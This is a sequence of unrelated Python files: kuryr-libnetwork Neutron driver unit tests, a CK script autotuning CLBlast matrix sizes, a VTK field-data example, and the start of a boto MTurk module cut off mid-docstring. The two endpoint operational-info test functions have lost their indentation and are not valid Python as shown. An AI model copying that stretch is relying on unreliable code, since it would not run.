        self._mock_out_network(fake_neutron_net_id, docker_network_id)
        # The following fake response is retrieved from the Neutron doc:
        # http://developer.openstack.org/api-ref-networking-v2.html#createSubnet # noqa
        subnet_v4_id = "9436e561-47bf-436a-b1f1-fe23a926e031"
        subnet_v6_id = "64dd4a98-3d7a-4bfd-acf4-91137a8d2f51"
        fake_v4_subnet = self._get_fake_v4_subnet(
            docker_network_id, docker_endpoint_id, subnet_v4_id)
        fake_v6_subnet = self._get_fake_v6_subnet(
            docker_network_id, docker_endpoint_id, subnet_v6_id)
        fake_subnetv4_response = {
            "subnets": [
                fake_v4_subnet['subnet']
            ]
        }
        fake_subnetv6_response = {
            "subnets": [
                fake_v6_subnet['subnet']
            ]
        }
        self.mox.StubOutWithMock(app.neutron, 'list_subnets')
        app.neutron.list_subnets(network_id=fake_neutron_net_id,
            cidr='192.168.1.0/24').AndReturn(fake_subnetv4_response)
        app.neutron.list_subnets(
            network_id=fake_neutron_net_id,
            cidr='fe80::/64').AndReturn(fake_subnetv6_response)
        fake_ipv4cidr = '192.168.1.2/24'
        fake_ipv6cidr = 'fe80::f816:3eff:fe20:57c4/64'
        fake_port_id = str(uuid.uuid4())
        fake_port = self._get_fake_port(
            docker_endpoint_id, fake_neutron_net_id,
            fake_port_id, lib_const.PORT_STATUS_ACTIVE,
            subnet_v4_id, subnet_v6_id)
        # The driver looks the port up by its fixed v4 and v6 addresses.
        fake_fixed_ips = ['subnet_id=%s' % subnet_v4_id,
                          'ip_address=192.168.1.2',
                          'subnet_id=%s' % subnet_v6_id,
                          'ip_address=fe80::f816:3eff:fe20:57c4']
        fake_port_response = {
            "ports": [
                fake_port['port']
            ]
        }
        self.mox.StubOutWithMock(app.neutron, 'list_ports')
        app.neutron.list_ports(fixed_ips=fake_fixed_ips).AndReturn(
            fake_port_response)
        # The matched port is renamed and bound to the endpoint.
        fake_updated_port = fake_port['port']
        fake_updated_port['name'] = '-'.join([docker_endpoint_id, 'port'])
        self.mox.StubOutWithMock(app.neutron, 'update_port')
        app.neutron.update_port(fake_updated_port['id'], {'port': {
            'name': fake_updated_port['name'],
            'device_owner': lib_const.DEVICE_OWNER,
            'device_id': docker_endpoint_id}}).AndReturn(fake_port)
        self.mox.ReplayAll()
        data = {
            'NetworkID': docker_network_id,
            'EndpointID': docker_endpoint_id,
            'Options': {},
            'Interface': {
                'Address': fake_ipv4cidr,
                'AddressIPv6': fake_ipv6cidr,
                'MacAddress': "fa:16:3e:20:57:c3"
            }
        }
        response = self.app.post('/NetworkDriver.CreateEndpoint',
                                 content_type='application/json',
                                 data=jsonutils.dumps(data))
        self.assertEqual(200, response.status_code)
        decoded_json = jsonutils.loads(response.data)
        expected = {'Interface': {}}
        self.assertEqual(expected, decoded_json)
def test_network_driver_endpoint_operational_info_with_no_port(self):
docker_network_id = lib_utils.get_hash()
docker_endpoint_id = lib_utils.get_hash()
fake_port_response = {"ports": []}
with mock.patch.object(app.neutron, 'list_ports') as mock_list_ports:
data = {
'NetworkID': docker_network_id,
'EndpointID': docker_endpoint_id,
}
mock_list_ports.return_value = fake_port_response
response = self.app.post('/NetworkDriver.EndpointOperInfo',
content_type='application/json',
data=jsonutils.dumps(data))
decoded_json = jsonutils.loads(response.data)
self.assertEqual(200, response.status_code)
port_name = utils.get_neutron_port_name(docker_endpoint_id)
mock_list_ports.assert_called_once_with(name=port_name)
self.assertEqual({}, decoded_json['Value'])
def test_network_driver_endpoint_operational_info(self):
docker_network_id = lib_utils.get_hash()
docker_endpoint_id = lib_utils.get_hash()
fake_neutron_net_id = str(uuid.uuid4())
fake_port_id = str(uuid.uuid4())
fake_port = self._get_fake_port(
docker_endpoint_id, fake_neutron_net_id,
fake_port_id, lib_const.PORT_STATUS_ACTIVE)
fake_port_response = {
"ports": [
fake_port['port']
]
}
with mock.patch.object(app.neutron, 'list_ports') as mock_list_ports:
data = {
'NetworkID': docker_network_id,
'EndpointID': docker_endpoint_id,
}
mock_list_ports.return_value = fake_port_response
response = self.app.post('/NetworkDriver.EndpointOperInfo',
content_type='application/json',
data=jsonutils.dumps(data))
decoded_json = jsonutils.loads(response.data)
self.assertEqual(200, response.status_code)
port_name = utils.get_neutron_port_name(docker_endpoint_id)
mock_list_ports.assert_called_once_with(name=port_name)
self.assertEqual(fake_port_response['ports'][0]['status'],
decoded_json['Value']['status'])
def test_network_driver_delete_endpoint(self):
    """DeleteEndpoint should succeed and return the SUCCESS schema."""
    request_payload = jsonutils.dumps({
        'NetworkID': lib_utils.get_hash(),
        'EndpointID': lib_utils.get_hash(),
    })
    response = self.app.post('/NetworkDriver.DeleteEndpoint',
                             content_type='application/json',
                             data=request_payload)
    self.assertEqual(200, response.status_code)
    self.assertEqual(constants.SCHEMA['SUCCESS'],
                     jsonutils.loads(response.data))
@ddt.data(
    (False), (True))
def test_network_driver_join(self, vif_plug_is_fatal):
    """Join returns gateway/interface info built from the Neutron port.

    Runs twice via ddt: once with best-effort VIF plugging and once with
    ``vif_plug_is_fatal`` set, in which case the driver additionally polls
    ``show_port`` until the port goes ACTIVE.  Uses mox record/replay, so
    every stubbed Neutron call below is an ordered expectation.
    """
    if vif_plug_is_fatal:
        # Force the fatal-plug code path in the app under test.
        self.mox.StubOutWithMock(app, "vif_plug_is_fatal")
        app.vif_plug_is_fatal = True
    fake_docker_net_id = lib_utils.get_hash()
    fake_docker_endpoint_id = lib_utils.get_hash()
    fake_container_id = lib_utils.get_hash()
    fake_neutron_net_id = str(uuid.uuid4())
    fake_neutron_network = self._mock_out_network(
        fake_neutron_net_id, fake_docker_net_id)
    fake_neutron_port_id = str(uuid.uuid4())
    self.mox.StubOutWithMock(app.neutron, 'list_ports')
    neutron_port_name = utils.get_neutron_port_name(
        fake_docker_endpoint_id)
    fake_neutron_v4_subnet_id = str(uuid.uuid4())
    fake_neutron_v6_subnet_id = str(uuid.uuid4())
    # Expect the driver to find the (still DOWN) port by name.
    fake_neutron_ports_response = self._get_fake_ports(
        fake_docker_endpoint_id, fake_neutron_net_id,
        fake_neutron_port_id, lib_const.PORT_STATUS_DOWN,
        fake_neutron_v4_subnet_id, fake_neutron_v6_subnet_id)
    app.neutron.list_ports(name=neutron_port_name).AndReturn(
        fake_neutron_ports_response)
    self.mox.StubOutWithMock(app.neutron, 'list_subnets')
    fake_neutron_subnets_response = self._get_fake_subnets(
        fake_docker_endpoint_id, fake_neutron_net_id,
        fake_neutron_v4_subnet_id, fake_neutron_v6_subnet_id)
    app.neutron.list_subnets(network_id=fake_neutron_net_id).AndReturn(
        fake_neutron_subnets_response)
    fake_neutron_port = fake_neutron_ports_response['ports'][0]
    fake_neutron_subnets = fake_neutron_subnets_response['subnets']
    # Binding yields the host-side veth peer name reported to Docker.
    _, fake_peer_name, _ = self._mock_out_binding(
        fake_docker_endpoint_id, fake_neutron_port,
        fake_neutron_subnets, fake_neutron_network['networks'][0])
    if vif_plug_is_fatal:
        # With fatal plugging the driver polls show_port; answer ACTIVE.
        self.mox.StubOutWithMock(app.neutron, 'show_port')
        fake_neutron_ports_response_2 = self._get_fake_port(
            fake_docker_endpoint_id, fake_neutron_net_id,
            fake_neutron_port_id, lib_const.PORT_STATUS_ACTIVE,
            fake_neutron_v4_subnet_id, fake_neutron_v6_subnet_id)
        app.neutron.show_port(fake_neutron_port_id).AndReturn(
            fake_neutron_ports_response_2)
    # Switch mox from record to replay mode before exercising the app.
    self.mox.ReplayAll()
    fake_subnets_dict_by_id = {subnet['id']: subnet
                               for subnet in fake_neutron_subnets}
    join_request = {
        'NetworkID': fake_docker_net_id,
        'EndpointID': fake_docker_endpoint_id,
        'SandboxKey': utils.get_sandbox_key(fake_container_id),
        'Options': {},
    }
    response = self.app.post('/NetworkDriver.Join',
                             content_type='application/json',
                             data=jsonutils.dumps(join_request))
    self.assertEqual(200, response.status_code)
    decoded_json = jsonutils.loads(response.data)
    fake_neutron_v4_subnet = fake_subnets_dict_by_id[
        fake_neutron_v4_subnet_id]
    fake_neutron_v6_subnet = fake_subnets_dict_by_id[
        fake_neutron_v6_subnet_id]
    expected_response = {
        'Gateway': fake_neutron_v4_subnet['gateway_ip'],
        'GatewayIPv6': fake_neutron_v6_subnet['gateway_ip'],
        'InterfaceName': {
            'DstPrefix': config.CONF.binding.veth_dst_prefix,
            'SrcName': fake_peer_name,
        },
        'StaticRoutes': []
    }
    self.assertEqual(expected_response, decoded_json)
def test_network_driver_leave(self):
    """Leave should unbind the endpoint's port and return SUCCESS.

    Fix: ``self.mox.ReplayAll()`` was previously called *after*
    ``self.app.post()``, so the recorded mox expectations were never
    actually replayed while the driver ran.  It now runs before the
    request, matching the ordering used by ``test_network_driver_join``.
    """
    fake_docker_net_id = lib_utils.get_hash()
    fake_docker_endpoint_id = lib_utils.get_hash()
    fake_neutron_net_id = str(uuid.uuid4())
    self._mock_out_network(fake_neutron_net_id, fake_docker_net_id)
    fake_neutron_port_id = str(uuid.uuid4())
    self.mox.StubOutWithMock(app.neutron, 'list_ports')
    neutron_port_name = utils.get_neutron_port_name(
        fake_docker_endpoint_id)
    fake_neutron_v4_subnet_id = str(uuid.uuid4())
    fake_neutron_v6_subnet_id = str(uuid.uuid4())
    # Expect the driver to find the ACTIVE port by its Neutron name.
    fake_neutron_ports_response = self._get_fake_ports(
        fake_docker_endpoint_id, fake_neutron_net_id,
        fake_neutron_port_id, lib_const.PORT_STATUS_ACTIVE,
        fake_neutron_v4_subnet_id, fake_neutron_v6_subnet_id)
    app.neutron.list_ports(name=neutron_port_name).AndReturn(
        fake_neutron_ports_response)
    fake_neutron_port = fake_neutron_ports_response['ports'][0]
    self._mock_out_unbinding(fake_docker_endpoint_id, fake_neutron_port)
    # Switch mox from record to replay mode BEFORE exercising the app.
    self.mox.ReplayAll()
    leave_request = {
        'NetworkID': fake_docker_net_id,
        'EndpointID': fake_docker_endpoint_id,
    }
    response = self.app.post('/NetworkDriver.Leave',
                             content_type='application/json',
                             data=jsonutils.dumps(leave_request))
    self.assertEqual(200, response.status_code)
    decoded_json = jsonutils.loads(response.data)
    self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
| |
#!/bin/python
import ck.kernel as ck
import copy
import re
import argparse
import os
import json
#######################################
# Description:
#
# KERNEL = xgemm client
# INPUT = SIZE (M,N,K); PRECISION
# OUTPUT = CONFIGURATION
#######################################
'''
Clock resolution semantics (set interval, e.g. resolution 25%):
  Set resolution 0   -> powersave mode: take the minimum frequency.
  Set resolution 1   -> performance mode: take the maximum frequency.
  Set resolution x, with x in (0, 1):
      Convert x to a percentage. Start from the lowest frequency; the next
      frequency is the first one at freq_min + x% of power.
  Set resolution 2   -> try all available frequencies.
Example of "set resolution x":
  Available frequencies: 100 MHz, 200 MHz, 400 MHz, 800 MHz, 2000 MHz.
  Set interval 50%.
  Lvl 0: 100 MHz
  Lvl 1: 150 MHz  // value not allowed
  Lvl 2: 200 MHz  OK
  Lvl 3: 250 MHz
'''
# clock_resolution
# 0 -> min freq
# 1 -> max freq [default]
# (0,1) -> "resolution convert": create intervals starting from min. Interval 0 = frequencies between min and min+(min*resolution);
#          otherwise take min and max and divide by a fixed number
# 2 -> run all the frequencies
# --- Tunable experiment configuration ------------------------------------
# See the clock_resolution legend above (0=min, 1=max, (0,1)=interval, 2=all).
clock_resolution = 1.0
kernel = [ 'default' ]  # CK command key(s) used for the pipeline cmd_key
title = 'CLBlast client'
# Matrix sizes: C[mxn] = A[mxk] * B[kxn].
#size_m = [ '512', '256', '128', '1024' ]
#size_n = [ '256', '512', '128', '1024' ]
#size_k = [ '128', '256', '1024', ' 128' ]
# Per-model GEMM shape files (batch size 1), consumed by loadMatrixFromJson().
alex_net_json = 'models/BatchSize1/AlexNet.json'
google_net_json = 'models/BatchSize1/GoogleNet.json'
squeeze11_net_json = 'models/BatchSize1/Squeeze1.1.json'
precision = 32 # default
run = 10 # default
# Diagnostic output switches and message prefixes.
VERBOSE = 0
VERBOSE_STR = '[VERBOSE] '
DEBUG = 0
DEBUG_STR = '[DEBUG] '
def loadMatrixFromJson(fin):
    """Load GEMM triples from a JSON file.

    The file must contain a list of objects with integer keys
    ``m``, ``n`` and ``k`` (one triple per GEMM call).

    :param fin: path to the JSON file
    :return: dict ``{'M': [...], 'N': [...], 'K': [...]}`` with the
             values in file order
    :raises OSError: if the file cannot be opened
    :raises KeyError: if an entry lacks one of 'm'/'n'/'k'

    Fix: the file handle was previously never closed; ``with`` now
    guarantees closure, and the three append-loops are comprehensions.
    """
    with open(fin) as f:
        entries = json.load(f)
    return {
        'M': [e['m'] for e in entries],
        'N': [e['n'] for e in entries],
        'K': [e['k'] for e in entries],
    }
def do(i, arg):
    """Run the CLBlast matrix-size autotuning pipeline via CK.

    :param i: unused CK-style input dict (kept for interface compatibility)
    :param arg: argparse namespace with ``fp`` (triples file), ``tos``
                (target OS) and ``did`` (device id)
    :return: CK-style dict; ``{'return': 0}`` on success, non-zero
             ``return`` plus ``error`` otherwise

    Fix: two Python 2 print statements (``print udepl`` /
    ``print lib_uoa``) were syntax errors under Python 3 while the rest
    of the script already used ``print(...)``; they are now function
    calls.
    """
    if arg.fp is not None:
        fin = arg.fp
        if (os.path.isfile(fin)):
            print ("File loading %s " %(fin))
            # TODO: actually load the file and its triples (not implemented)
        else:
            print("File %s not found " %(fin))
    # Load the per-model GEMM shape matrices.
    alex_net = loadMatrixFromJson(alex_net_json)
    google_net = loadMatrixFromJson(google_net_json)
    squeeze11_net = loadMatrixFromJson(squeeze11_net_json)
    dataset =[]
    dataset.append({'Model_name': 'AlexNet', 'Batch_size' : 1, 'matrix' : alex_net})
    dataset.append({'Model_name': 'GoogleNet', 'Batch_size' : 1, 'matrix' : google_net})
    dataset.append({'Model_name': 'SqueezeNet1.1', 'Batch_size' : 1, 'matrix' : squeeze11_net})
    if VERBOSE or DEBUG:
        print('[Experiment] %s' % title)
        print('[Preparing pipeline] Clock resolution: %d' % clock_resolution)
        print('[Preparing pipeline] Precision: %d' % precision)
        print('[Preparing pipeline] Run for configuration: %d' % run)
        print('[Preparing pipeline] More parms... ')
    # Detect basic platform info.
    ii={'action':'detect',
        'module_uoa':'platform',
        'con':'con'}
    r=ck.access(ii)
    if DEBUG: print("%s %s" %(DEBUG_STR, r))
    if r['return']>0: return r
    # Host and target OS params.
    hos=r['host_os_uoa']
    hosd=r['host_os_dict']
    tos=r['os_uoa']
    tosd=r['os_dict']
    tdid=r['device_id']
    if DEBUG: print("%s %s %s" %(DEBUG_STR, hos, hosd))
    if DEBUG: print("%s %s %s %s" %( DEBUG_STR, tos, tosd, tdid))
    # Load CLBLAST program meta and desc to check deps.
    ii={'action':'load',
        'module_uoa':'program',
        'data_uoa':'clblast-tune'}
    rx=ck.access(ii)
    if DEBUG: print("%s %s " %(DEBUG_STR, rx))
    if rx['return']>0: return rx
    meta= rx['dict']
    # Get compile-time and run-time deps.
    cdeps=meta.get('compile_deps',{})
    rdeps=meta.get('run_deps',{})
    # Merge rdeps with cdeps for setting up the pipeline (which uses
    # common deps), but tag them as "for_run_time".
    for k in rdeps:
        cdeps[k]=rdeps[k]
        cdeps[k]['for_run_time']='yes'
    # CLblast libs.
    depl=copy.deepcopy(cdeps['lib-clblast'])
    # Allow overriding target OS/device from the command line (local machine).
    if ((arg.tos is not None) and (arg.did is not None) ):
        tos=arg.tos
        tdid=arg.did
    ii={'action':'resolve',
        'module_uoa':'env',
        'host_os':hos,
        'target_os':tos,
        'device_id':tdid,
        'out':'con',
        'deps':{'lib-clblast':copy.deepcopy(depl)}
    }
    r=ck.access(ii)
    if r['return']>0: return r
    udepl=r['deps']['lib-clblast'].get('choices',[])
    if len(udepl)==0: return {'return':1, 'error':'no installed CLBlast libs'}
    cdeps['lib-clblast']['uoa']=udepl[0]
    # Prepare the program pipeline (compile-only dry run at max frequencies).
    ii={'action':'pipeline',
        'module_uoa':'program',
        'data_uoa':'clblast-tune',
        'prepare':'yes',
        'dependencies': cdeps,
        'no_compiler_description':'yes',
        'cmd_key':kernel[0],
        "target_os":tos,
        "device_id":tdid,
        "out":'con',
        "no_state_check":"yes",
        'flags':'-O3',
        'cpu_freq' : 'max',
        'gpu_freq' : 'max',
    }
    r=ck.access(ii)
    if r['return']>0: return r
    fail=r.get('fail','')
    if fail=='yes': return {'return':10, 'error':'pipeline failed ('+r.get('fail_reason','')+')'}
    ready=r.get('ready','')
    if ready!='yes': return {'return':11, 'error':'pipeline not ready'}
    state=r['state']
    tmp_dir=state['tmp_dir']
    xcdeps=r.get('dependencies',{})
    # Clean pipeline before reusing it as a template for each run.
    if 'ready' in r: del(r['ready'])
    if 'fail' in r: del(r['fail'])
    if 'return' in r: del(r['return'])
    pipeline=copy.deepcopy(r)
    print(udepl)  # FIX: was Python 2 statement `print udepl`
    # For each Clblast lib ***********************************
    for lib_uoa in udepl:
        print(lib_uoa)  # FIX: was Python 2 statement `print lib_uoa`
        ii={'action' : 'load',
            'module_uoa' : 'env',
            'data_uoa' : lib_uoa}
        r=ck.access(ii)
        if r['return']>0 : return r
        lib_name=r['data_name']
        # Derive experiment tags from the package UOA, dropping generic parts.
        lib_tags=r['dict']['customize']['used_package_uoa'].split('-')
        tags=''
        skip_tags = ['lib','master', 'universal']
        for t in lib_tags:
            if t not in skip_tags:
                tags+= t + '-'
        # Add the version as the final tag component.
        lib_tags=r['dict']['setup']['version']
        tags += lib_tags
        # For each model in dataset
        for model in dataset:
            record_repo='local'
            record_uoa='explore-matrix-size-'+tags+'-' + model['Model_name']
            ck.out('---------------------------------------------------------------------------------------')
            ck.out('Experiment - %s:%s' % (record_repo, record_uoa))
            cpipeline=copy.deepcopy(pipeline)
            # Autotune over the model's (M, N, K) triples in lock-step.
            ii={
                'action':'autotune',
                'module_uoa':'pipeline',
                'data_uoa':'program',
                'choices_order':[
                    [
                        '##env#CK_CLBLAST_MSIZE'
                    ],
                    [
                        '##env#CK_CLBLAST_NSIZE',
                    ],
                    [
                        '##env#CK_CLBLAST_KSIZE'
                    ]
                ],
                'choices_selection':[
                    {"type":"loop-with-next", "choice":model['matrix']['M'], "default":"256"},
                    {"type":"loop-with-next", "choice":model['matrix']['N'], "default":"256"},
                    {"type":"loop-with-next", "choice":model['matrix']['K'], "default":"256"}
                ],
                'features_keys_to_process':['##choices#*'],
                'iterations':-1,
                'repetitions':3,
                'record':'yes',
                'record_failed':'yes',
                'record_params':{
                    'search_point_by_features':'yes'
                },
                'record_repo':record_repo,
                'record_uoa':record_uoa,
                'tags':['explore-clblast-matrix-size-client', tags, model['Model_name']],
                'pipeline': cpipeline,
                'out':'con'
            }
            r=ck.access(ii)
            if DEBUG > 0: print("%s %s" %(DEBUG_STR, r))
            if r['return']>0: return r
            fail=r.get('fail','')
            if fail=='yes':
                return {'return':10, 'error':'pipeline failed ('+r.get('fail_reason','')+')'}
    return {'return':0}
# Command-line interface: --target_os/--device_id select the CK target
# platform; --file optionally supplies a file of GEMM triples.
parser = argparse.ArgumentParser(description='Short sample app')
parser.add_argument("--target_os", action="store", dest="tos")
parser.add_argument("--device_id", action="store", dest="did")
parser.add_argument("--file", action="store", dest="fp")
myarg=parser.parse_args()
r=do({}, myarg)
if r['return']>0: ck.err(r)  # report the CK-style error and exit non-zero
| |
#!/usr/bin/env python
# This example demonstrates the use of fields and use of
# vtkProgrammableDataObjectSource. It creates fields the hard way (as
# compared to reading a vtk field file), but shows you how to
# interface to your own raw data.
import os
import re
import vtk
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Field names from the financial data set: three arrays used as spatial
# axes plus the scalar that gets visualized.
xAxis = "INTEREST_RATE"
yAxis = "MONTHLY_PAYMENT"
zAxis = "MONTHLY_INCOME"
scalar = "TIME_LATE"
def getNumberFromLine(line):
    """Extract every number in *line* and return them as a list of floats.

    Accepts optional sign, decimal point and a simple exponent part
    (e.g. ``-4``, ``3.5``, ``1e3``).

    :param line: the text line to scan
    :return: list of floats in order of appearance (empty if none)

    Fix: the pattern is now a raw string — ``'[\\d.]'`` in a plain string
    relies on ``\\d`` being an unrecognized escape, which raises a
    DeprecationWarning (and eventually an error) on modern Python.
    """
    patn = re.compile(r'[-+]{0,1}[\d.]+e?[-+\d]*', re.M)
    return [float(tok) for tok in patn.findall(line)]
# Parse an ASCII file and manually create a field. Then construct a
# dataset from the field.
# The programmable source's execute method (parseFile, defined below and
# attached later via SetExecuteMethod) fills in the field data on demand.
dos = vtk.vtkProgrammableDataObjectSource()
# First define the function that will parse the data.
def parseFile():
    """Read ``Data/financial.txt`` and populate ``dos``'s field data.

    The file stores a point count followed by named arrays written 8
    values per line.  TIME_LATE, MONTHLY_PAYMENT, INTEREST_RATE and
    MONTHLY_INCOME are loaded as vtkFloatArrays; UNPAID_PRINCIPLE and
    LOAN_AMOUNT are skipped.

    Fixes: ``(numPts - 1)/8`` is true division under Python 3 and made
    ``range()`` fail with a float — it is now ``//``; the file handle
    was never closed — it is now managed by ``with``.
    """
    global VTK_DATA_ROOT, dos

    def _seek_to(f, name):
        # Advance past lines until one starting with `name` is found.
        while f.readline()[:len(name)] != name:
            pass

    def _read_array(f, n_lines, name):
        # Read n_lines of 8 whitespace-separated values into a named array.
        arr = vtk.vtkFloatArray()
        arr.SetName(name)
        for _ in range(n_lines):
            vals = getNumberFromLine(f.readline())
            for j in range(8):
                arr.InsertNextValue(vals[j])
        return arr

    def _skip_array(f, n_lines):
        # Consume an array's lines without storing them.
        for _ in range(n_lines):
            f.readline()

    with open(os.path.join(VTK_DATA_ROOT, "Data/financial.txt"), "r") as f:
        numPts = int(getNumberFromLine(f.readline())[0])
        # 8 values per line; integer division keeps this an int for range().
        numLines = (numPts - 1) // 8
        # Get the data object's field data and allocate room for 4 fields.
        fieldData = dos.GetOutput().GetFieldData()
        fieldData.AllocateArrays(4)
        # TIME_LATE - dependent variable
        _seek_to(f, "TIME_LATE")
        fieldData.AddArray(_read_array(f, numLines, "TIME_LATE"))
        # MONTHLY_PAYMENT - independent variable
        _seek_to(f, "MONTHLY_PAYMENT")
        fieldData.AddArray(_read_array(f, numLines, "MONTHLY_PAYMENT"))
        # UNPAID_PRINCIPLE - skip
        _seek_to(f, "UNPAID_PRINCIPLE")
        _skip_array(f, numLines)
        # LOAN_AMOUNT - skip
        _seek_to(f, "LOAN_AMOUNT")
        _skip_array(f, numLines)
        # INTEREST_RATE - independent variable
        _seek_to(f, "INTEREST_RATE")
        fieldData.AddArray(_read_array(f, numLines, "INTEREST_RATE"))
        # MONTHLY_INCOME - independent variable
        _seek_to(f, "MONTHLY_INCOME")
        fieldData.AddArray(_read_array(f, numLines, "MONTHLY_INCOME"))
# Arrange to call the parsing function when the programmable data
# source is executed.
dos.SetExecuteMethod(parseFile)
# Create the dataset.
# DataObjectToDataSetFilter can create geometry using fields from
# DataObject's FieldData
do2ds = vtk.vtkDataObjectToDataSetFilter()
do2ds.SetInputConnection(dos.GetOutputPort())
# We are generating polygonal data
do2ds.SetDataSetTypeToPolyData()
do2ds.DefaultNormalizeOn()
# All we need is points. Assign the three named field arrays as the
# x/y/z point components (component 0 of each).
do2ds.SetPointComponent(0, xAxis, 0)
do2ds.SetPointComponent(1, yAxis, 0)
do2ds.SetPointComponent(2, zAxis, 0)
# RearrangeFields is used to move fields between DataObject's
# FieldData, PointData and CellData.
rf = vtk.vtkRearrangeFields()
rf.SetInputConnection(do2ds.GetOutputPort())
# Add an operation to "move TIME_LATE from DataObject's FieldData to
# PointData"
rf.AddOperation("MOVE", scalar, "DATA_OBJECT", "POINT_DATA")
# Force the filter to execute. This is needed to force the pipeline
# to execute so that we can find the range of the array TIME_LATE
rf.Update()
# Set max to the second element (GetRange returns [min, max]) of the "range
# of the array called scalar in the PointData of the output of rf".
# NOTE(review): the name shadows the builtin `max`; kept because later
# statements reference it.
max = rf.GetOutput().GetPointData().GetArray(scalar).GetRange()[1]
# Use an ArrayCalculator to normalize TIME_LATE
calc = vtk.vtkArrayCalculator()
calc.SetInputConnection(rf.GetOutputPort())
# Working on point data
calc.SetAttributeModeToUsePointData()
# Map scalar to s. When setting function, we can use s to
# represent the array scalar (TIME_LATE)
calc.AddScalarVariable("s", scalar, 0)
# Divide scalar by max (applies division to all components of the array)
calc.SetFunction("s / %f"%max)
# The output array will be called resArray
calc.SetResultArrayName("resArray")
# Use AssignAttribute to make resArray the active scalar field
aa = vtk.vtkAssignAttribute()
aa.SetInputConnection(calc.GetOutputPort())
aa.Assign("resArray", "SCALARS", "POINT_DATA")
aa.Update()
# Construct the pipeline for the original population:
# GaussianSplatter -> Contour -> Mapper -> Actor
popSplatter = vtk.vtkGaussianSplatter()
popSplatter.SetInputConnection(aa.GetOutputPort())
popSplatter.SetSampleDimensions(50, 50, 50)
popSplatter.SetRadius(0.05)
popSplatter.ScalarWarpingOff()
popSurface = vtk.vtkContourFilter()
popSurface.SetInputConnection(popSplatter.GetOutputPort())
popSurface.SetValue(0, 0.01)
popMapper = vtk.vtkPolyDataMapper()
popMapper.SetInputConnection(popSurface.GetOutputPort())
popMapper.ScalarVisibilityOff()
popActor = vtk.vtkActor()
popActor.SetMapper(popMapper)
# Semi-transparent light-grey cloud for the whole population.
popActor.GetProperty().SetOpacity(0.3)
popActor.GetProperty().SetColor(.9, .9, .9)
# This is for decoration only.
def CreateAxes():
    """Build decoration actors: tubed axes plus one 3D label per axis.

    Uses the bounds/length of ``popSplatter``'s output to size and place
    the axes, so the splatter pipeline is updated first.

    :return: tuple ``(axesActor, XActor, YActor, ZActor)`` of vtkActor /
             vtkFollower instances ready to be added to a renderer
    """
    global xAxis, yAxis, zAxis, popSplatter
    # Create axes sized to the splatted volume.
    popSplatter.Update()
    bounds = popSplatter.GetOutput().GetBounds()
    axes = vtk.vtkAxes()
    axes.SetOrigin(bounds[0], bounds[2], bounds[4])
    axes.SetScaleFactor(popSplatter.GetOutput().GetLength()/5.0)
    # Render the axes as thin tubes instead of bare lines.
    axesTubes = vtk.vtkTubeFilter()
    axesTubes.SetInputConnection(axes.GetOutputPort())
    axesTubes.SetRadius(axes.GetScaleFactor()/25.0)
    axesTubes.SetNumberOfSides(6)
    axesMapper = vtk.vtkPolyDataMapper()
    axesMapper.SetInputConnection(axesTubes.GetOutputPort())
    axesActor = vtk.vtkActor()
    axesActor.SetMapper(axesMapper)
    # Label the axes (vtkFollower keeps the text facing the camera).
    XText = vtk.vtkVectorText()
    XText.SetText(xAxis)
    XTextMapper = vtk.vtkPolyDataMapper()
    XTextMapper.SetInputConnection(XText.GetOutputPort())
    XActor = vtk.vtkFollower()
    XActor.SetMapper(XTextMapper)
    XActor.SetScale(0.02, .02, .02)
    XActor.SetPosition(0.35, -0.05, -0.05)
    XActor.GetProperty().SetColor(0, 0, 0)
    YText = vtk.vtkVectorText()
    YText.SetText(yAxis)
    YTextMapper = vtk.vtkPolyDataMapper()
    YTextMapper.SetInputConnection(YText.GetOutputPort())
    YActor = vtk.vtkFollower()
    YActor.SetMapper(YTextMapper)
    YActor.SetScale(0.02, .02, .02)
    YActor.SetPosition(-0.05, 0.35, -0.05)
    YActor.GetProperty().SetColor(0, 0, 0)
    ZText = vtk.vtkVectorText()
    ZText.SetText(zAxis)
    ZTextMapper = vtk.vtkPolyDataMapper()
    ZTextMapper.SetInputConnection(ZText.GetOutputPort())
    ZActor = vtk.vtkFollower()
    ZActor.SetMapper(ZTextMapper)
    ZActor.SetScale(0.02, .02, .02)
    ZActor.SetPosition(-0.05, -0.05, 0.35)
    ZActor.GetProperty().SetColor(0, 0, 0)
    return axesActor, XActor, YActor, ZActor
axesActor, XActor, YActor, ZActor = CreateAxes()
# Create the render window, renderer, interactor
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetWindowName("vtk - Field Data")
renWin.SetSize(500, 500)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
ren.AddActor(axesActor)
ren.AddActor(XActor)
ren.AddActor(YActor)
ren.AddActor(ZActor)
ren.AddActor(popActor)
ren.SetBackground(1, 1, 1)
# Set the default camera position
camera = vtk.vtkCamera()
camera.SetClippingRange(.274, 13.72)
camera.SetFocalPoint(0.433816, 0.333131, 0.449)
camera.SetPosition(-1.96987, 1.15145, 1.49053)
camera.SetViewUp(0.378927, 0.911821, 0.158107)
ren.SetActiveCamera(camera)
# Assign the camera to the followers so labels always face it.
XActor.SetCamera(camera)
YActor.SetCamera(camera)
ZActor.SetCamera(camera)
# Start the interactive event loop.
iren.Initialize()
renWin.Render()
iren.Start()
| |
# Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class Question(object):
    """A single MTurk question: identifier, content and answer spec.

    ``content`` and ``answer_spec`` are any objects exposing
